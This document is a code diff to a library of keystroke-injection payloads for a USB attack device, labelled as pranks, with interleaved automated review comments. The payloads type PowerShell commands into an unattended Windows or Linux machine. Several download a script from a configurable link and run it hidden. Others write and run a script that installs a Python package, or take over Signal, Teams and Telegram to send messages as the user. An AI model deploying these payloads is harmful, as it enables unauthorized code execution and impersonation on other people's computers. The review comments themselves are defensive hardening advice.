+ END_IF + END_REM +END_EXTENSION GUI r DELAY 500 -STRING powershell -ENTER +STRINGLN powershell DELAY 1500 REM Create the file -STRING New-Item -Path ".\script.py" -ItemType "file" -Force; +STRING New-Item -Path ".\script.py" -ItemType "file" -Force; REM Write the code into the file -STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();" -ENTER +STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. 
Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();" DELAY 1000 REM Execute the Python script -STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden -ENTER +STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden REM Close the PowerShell DELAY 1000 diff --git a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt index 704dd3f..151a556 100644 --- a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt +++ b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt 
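Review bot: The script written by the `Set-Content` line in Alien Message From Computer runs `os.system('pip install pyttsx3')` on the host at run time, which installs whatever version the package index serves at that moment and ignores the exit status, so `import pyttsx3` fails without explanation when pip is missing or the machine is offline. Listing pyttsx3 under Requirements in the header (next to Python) and dropping the install call, or at least pinning it as `pip install pyttsx3==<PINNED_VERSION>`, avoids pulling unreviewed code. `motore.getProperty('voices')[1]` also assumes a second voice is installed and raises IndexError otherwise. The tail of the payload is outside this hunk.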
@@ -1,36 +1,72 @@ -REM ###################################################### -REM # | -REM # Title : Change Wallpaper With Screenshot | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10-11 | -REM # | -REM ###################################################### - - -REM Requirements: -REM - Internet Connection -REM - ExecutionPolicy Bypass -REM - Python +REM_BLOCK +###################################################### +# # +# Title : Change Wallpaper With Screenshot # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10-11 # +# # +###################################################### +Requirements: + - Internet Connection + - ExecutionPolicy Bypass + - Python +END_REM REM REQUIRED - Set your Python script link -DEFINE SCRIPT-PY-LINK example.com +DEFINE #SCRIPT-PY-LINK example.com +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 1000 -STRING powershell -ENTER +STRINGLN powershell DELAY 2000 - -STRING Invoke-WebRequest -Uri " -STRING SCRIPT-PY-LINK -STRING " -OutFile "script.py" -ENTER +STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py" DELAY 2000 STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden diff --git a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt index 3158172..2305c40 100644 --- a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt +++ b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt 
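Review bot: In Change Wallpaper With Screenshot, `Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"` followed by `Start-Process python.exe -ArgumentList "script.py"` runs whatever the link returns, and the placeholder `DEFINE #SCRIPT-PY-LINK example.com` carries no scheme, so a user who keeps that form may end up fetching the script over plain HTTP. The placeholder and its comment should show an `https://` URL, e.g. `DEFINE #SCRIPT-PY-LINK https://example.com/script.py`, and the header could state that the script is executed exactly as downloaded. The Full-ScreenBannerJoke hunk has the same pair of lines.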
@@ -1,39 +1,58 @@ -REM ########################################### -REM # | -REM # Title : Change Desktop Wallpaper | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Linux (KDE based) | -REM # | -REM ########################################### +REM_BLOCK +########################################### +# # +# Title : Change Desktop Wallpaper # +# Author : Aleff # +# Version : 1.1 # +# Category : Prank # +# Target : Linux (KDE based) # +# # +########################################### -REM Requirements: -REM - Internet Connection +Requirements: + - Internet Connection +END_REM + +REM Replace 'example.com/IMAGE_NAME' with your image link +DEFINE #IMAGE_LINK example.com/IMAGE_NAME + +REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg +DEFINE #IMAGE_PATH="file://example.jpg" + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION -DELAY 1000 CTRL-ALT t DELAY 2000 -REM Replace 'example.com/IMAGE_NAME' with your image link -DEFINE IMAGE_LINK example.com/IMAGE_NAME -STRING wget -STRING IMAGE_LINK -ENTER - -REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg -DEFINE IMAGE_PATH="file://example.jpg" +STRINGLN wget #IMAGE_LINK REM It depends by the Internet Connection DELAY 2000 -STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i 0)) + 
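Review bot: `DEFINE #IMAGE_PATH="file://example.jpg"` in ChangeDesktopWallpaper_LinuxKDE joins name and value with `=`, whereas every other definition in this diff uses a space (`DEFINE #IMAGE_LINK example.com/IMAGE_NAME`); as written the whole token is likely taken as the constant's name, leaving `#IMAGE_PATH` undefined. Suggested: `DEFINE #IMAGE_PATH "file://example.jpg"` if the quotes are meant to reach the typed command, otherwise the same without them. The comment above it asks for a path such as `/home/USERNAME/example.jpg`, which as a `file://` URI needs three slashes (`file:///home/USERNAME/example.jpg`). The `qdbus` line that consumes the constant is cut off in this view, so the exact form it expects should be checked there.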
DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 500 -STRING powershell -ENTER +STRINGLN powershell DELAY 2000 STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}") diff --git a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt index b6bc903..e304170 100644 --- a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt +++ b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt 
@@ -1,36 +1,73 @@ - -REM ############################################ -REM # | -REM # Title : Full-Screen Banner Joke | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10-11 | -REM # | -REM ############################################ +REM_BLOCK +############################################ +# # +# Title : Full-Screen Banner Joke # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10-11 # +# # +############################################ -REM Requirements: -REM - Internet Connection -REM - Python installed -REM - ExecutionPolicy Bypass - +Requirements: + - Internet Connection + - Python installed + - ExecutionPolicy Bypass +END_REM REM REQUIRED - Set your Python script link -DEFINE SCRIPT-PY-LINK example.com +DEFINE #SCRIPT-PY-LINK example.com +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 500 -STRING powershell -ENTER +STRINGLN powershell DELAY 500 -STRING Invoke-WebRequest -Uri " -STRING SCRIPT-PY-LINK -STRING " -OutFile "script.py" -ENTER +STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py" DELAY 500 STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden diff --git a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt index d3c0e85..1ea18b0 100644 --- a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt +++ b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt 
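Review bot: The last two lines of the Full-ScreenBannerJoke hunk download `#SCRIPT-PY-LINK` with `Invoke-WebRequest` and pass `script.py` straight to `python.exe`, with nothing tying the file to a known script. The default `example.com` also carries no scheme, so nothing in the payload requires HTTPS. Whoever controls or can tamper with that link decides what runs on the machine under test. I would make the placeholder an explicit `https://` URL and compare the download against a digest recorded in the payload before the `Start-Process` line, e.g. `DEFINE #SCRIPT-PY-SHA256 <EXPECTED_SHA256>` checked with `(Get-FileHash script.py -Algorithm SHA256).Hash`. The same download-then-run pair appears in the The_Mouse_Moves_By_Itself hunk later in this diff.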
@@ -1,29 +1,69 @@ -REM ################################################## -REM # | -REM # Title : Play A Song Through Spotify | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10-11 | -REM # | -REM ################################################## - - -REM Requirements: -REM - Internet Connection -REM - Spotify installed and user logged-in -REM - ExecutionPolicy Bypass +REM_BLOCK +################################################## +# # +# Title : Play A Song Through Spotify # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10-11 # +# # +################################################## +Requirements: + - Internet Connection + - Spotify installed and user logged-in + - ExecutionPolicy Bypass +END_REM REM REQUIRED - Set your song name -DEFINE SONG-NAME example +DEFINE #SONG-NAME example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 1000 -STRING powershell -ENTER +STRINGLN powershell DELAY 2000 STRINGLN Start-Process "spotify://" @@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click REM ESCAPE REM DELAY 500 -STRING SONG-NAME -ENTER +STRINGLN #SONG-NAME DELAY 1000 TAB DELAY 500 diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 3712631..9b5b0ed 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -1,12 +1,14 @@ -REM ##################################################### -REM # # -REM # Title : Prank In The Middle - Thunderbird # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Prank # -REM # Target : Windows 10/11 # -REM # # -REM ##################################################### +REM_BLOCK +##################################################### +# # +# Title : Prank In The Middle - Thunderbird # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11 # +# # +##################################################### +END_REM EXTENSION DETECT_READY REM VERSION 1.1 @@ -38,8 +40,7 @@ END_EXTENSION REM Open Thunderbird and goto settings GUI r -STRING thunderbird -ENTER +STRINGLN thunderbird DELAY 1000 REPEAT 4 TAB ENTER @@ -70,8 +71,7 @@ DELAY 500 REM Open the powershell and goto the directory GUI r -STRING powershell -ENTER +STRINGLN powershell DELAY 1500 STRING cd DELAY 500 diff --git a/payloads/library/prank/SendMessagesInTeams/payload.txt b/payloads/library/prank/SendMessagesInTeams/payload.txt index 3ff4497..0212ff9 100644 --- a/payloads/library/prank/SendMessagesInTeams/payload.txt +++ b/payloads/library/prank/SendMessagesInTeams/payload.txt 
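Review bot: `PASSIVE_WINDOWS_DETECT` sets `$_OS`, but the first PlayASongThroughSpotify_Windows hunk goes straight from `END_EXTENSION` to `GUI r` and never reads it, so the Windows-only keystrokes are typed into whatever host the device is plugged into. The extension's own `EXAMPLE USAGE` block shows the intended guard. Wrapping the body in `IF ($_OS == WINDOWS) THEN` … `END_IF` keeps the keystrokes off a non-Windows machine. The same applies to the Full-ScreenBannerJoke, SendMessagesInTeams, SendSignalMessages and The_Mouse_Moves_By_Itself hunks in this diff. The payload body continues past this hunk, so the closing `END_IF` would land outside it.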
@@ -1,37 +1,82 @@ -REM ########################################### -REM # | -REM # Title : Send Messages In Teams | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10-11 | -REM # | -REM ########################################### +REM_BLOCK +########################################### +# # +# Title : Send Messages In Teams # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10-11 # +# # +########################################### -REM Requirements: -REM - Microsoft Teams installed and user logged-in -REM - Internet Connection -REM - ExecutionPolicy Bypass -REM - Python +Requirements: + - Microsoft Teams installed and user logged-in + - Internet Connection + - ExecutionPolicy Bypass + - Python -REM 1. Open a powershell -REM 2. Close if Teams is opens and reopen it -REM 3. Goto search bar -REM 4. Search the person by name, email, id or what you want... -REM 5. Downarrow and enter to open the chat +1. Open a powershell +2. Close if Teams is opens and reopen it +3. Goto search bar +4. Search the person by name, email, id or what you want... +5. Downarrow and enter to open the chat +END_REM REM REQUIRED - Name, email, id or what you want for contact the target -DEFINE USER-ID example -REM REQUIRED - Messages -DEFINE MESSAGE1 example -REM ... -REM DEFINE MESSAGEN example.. +DEFINE #USER-ID example + +REM REQUIRED - Messages +DEFINE #MESSAGE1 example + +REM ... +REM DEFINE #MESSAGEN example.. + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. 
+ + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 1000 -STRING powershell -ENTER +STRINGLN powershell DELAY 2000 REM #### Powershell #### @@ -44,8 +89,7 @@ DELAY 10000 REM #### Teams #### CTRL N DELAY 2000 -STRING USER-ID -ENTER +STRINGLN #USER-ID DELAY 2000 TAB DELAY 1000 @@ -53,11 +97,10 @@ TAB DELAY 1000 REM #### Messages #### -STRING MESSAGE1 -ENTER +STRINGLN #MESSAGE1 DELAY 1000 REM ... -REM STRINGLN MESSAGEN +REM STRINGLN #MESSAGEN DELAY 500 ALT F4 diff --git a/payloads/library/prank/SendSignalMessages/payload.txt b/payloads/library/prank/SendSignalMessages/payload.txt index 71c5263..95bee72 100644 --- a/payloads/library/prank/SendSignalMessages/payload.txt +++ b/payloads/library/prank/SendSignalMessages/payload.txt 
@@ -1,41 +1,83 @@ -REM ######################################### -REM # | -REM # Title : Send Signal Messages | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank, Execution | -REM # Target : Windows 10-11 | -REM # | -REM ######################################### +REM_BLOCK +######################################### +# # +# Title : Send Signal Messages # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank, Execution # +# Target : Windows 10-11 # +# # +######################################### -REM Requirements: -REM - Internet Connection -REM - Signal App installed -REM Payload Plug-And-Play but can be edited as you want the message +Requirements: + - Internet Connection + - Signal App installed +Payload Plug-And-Play but can be edited as you want the message +END_REM REM REQUIRED - Receiver number -DEFINE NUMBER 3332211000 +DEFINE #NUMBER 3332211000 REM REQUIRED - Message to send -DEFINE MESSAGE YOUR_MESSAGE +DEFINE #MESSAGE example + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! 
+ ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 500 -STRING powershell -ENTER +STRINGLN powershell DELAY 500 -STRING Stop-Process -Name "Signal" -ENTER -STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit -ENTER +STRINGLN Stop-Process -Name "Signal" +DELAY 500 +STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit DELAY 5000 TAB TAB TAB ENTER DELAY 100 -STRING NUMBER +STRING #NUMBER DELAY 100 TAB DELAY 100 @@ -44,8 +86,7 @@ DELAY 200 REM This is the message that will be sent. REM You can change it as you want, if you want. -STRING YOUR_MESSAGE -ENTER +STRINGLN #MESSAGE REM Closing Signal App DELAY 500 diff --git a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt index 10ab2b3..0d057ed 100644 --- a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt +++ b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt 
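Review bot: `DEFINE #NUMBER 3332211000` in the first SendSignalMessages hunk still reads like a dialable number, while the same hunk changes the message default to the neutral `example`. If the payload is run without editing, the text would presumably be addressed to whoever owns that number. An unmistakable placeholder such as `DEFINE #NUMBER example`, matching `#MESSAGE` and the `REQUIRED` comment above it, makes an unconfigured payload more likely to match no contact at all.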
@@ -1,37 +1,64 @@ - -REM ######################################### -REM # | -REM # Title : Send Telegram Messages | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Linux | -REM # | -REM ######################################### +REM_BLOCK +######################################### +# # +# Title : Send Telegram Messages # +# Author : Aleff # +# Version : 1.1 # +# Category : Prank # +# Target : Linux # +# # +######################################### -REM Requirements: -REM - Internet Connection -REM - telegram-desktop installed and activated +Requirements: + - Internet Connection + - telegram-desktop installed and activated +END_REM + +REM Define the message receiver username +DEFINE #USERNAME @example + +REM Define the message(s) +DEFINE #MESSAGE1 example + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION -DELAY 1000 CTRL-ALT t DELAY 2000 -STRING telegram-desktop -ENTER +STRINGLN telegram-desktop REM It depends by the computer... DELAY 3000 -REM Define the message receiver username -DEFINE USERNAME @example -STRING USERNAME -ENTER +STRINGLN #USERNAME DELAY 500 -REM Define the message(s) -DEFINE MESSAGE1 example -STRING MESSAGE1 -ENTER +STRINGLN #MESSAGE1 DELAY 500 REM other messages here... REM ... 
diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt index 9abbe92..8c4fa42 100644 --- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt 
@@ -1,33 +1,70 @@ -REM ############################################ -REM # | -REM # Title : The Mouse Moves By Itself | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : Windows 10/11 | -REM # | -REM ############################################ - - -REM Requirements: -REM - Internet Connection +REM_BLOCK +############################################ +# # +# Title : The Mouse Moves By Itself # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11 # +# # +############################################ +Requirements: + - Internet Connection +END_REM REM REQUIRED - Set your Python script link -DEFINE SCRIPT-PY-LINK example.com +DEFINE #SCRIPT-PY-LINK example.com +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION -DELAY 1000 GUI r DELAY 500 -STRING powershell -ENTER +STRINGLN powershell DELAY 500 -STRING Invoke-WebRequest -Uri " -STRING SCRIPT-PY-LINK -STRING " -OutFile "script.py" -ENTER +STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py" DELAY 500 STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden diff --git a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt index e6ee5ab..c2f036f 100644 --- a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt +++ b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt @@ -1,15 +1,18 @@ -REM ############################################################ -REM # # -REM # Title : This damn shell doesn't work, SO SAD! :C # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Prank # -REM # Target : Linux # -REM # # -REM ############################################################ +REM_BLOCK +############################################################ +# # +# Title : This damn shell doesn't work, SO SAD! :C # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Linux # +# # +############################################################ + +Requirements: + - Nothing <3 +END_REM -REM Requirements: -REM - Nothing <3 REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution. DEFINE #TARGET_KALI_LINUX TRUE diff --git a/payloads/library/prank/Try_To_Catch_Me/payload.txt b/payloads/library/prank/Try_To_Catch_Me/payload.txt index d9eb8e7..84d591e 100644 --- a/payloads/library/prank/Try_To_Catch_Me/payload.txt +++ b/payloads/library/prank/Try_To_Catch_Me/payload.txt 
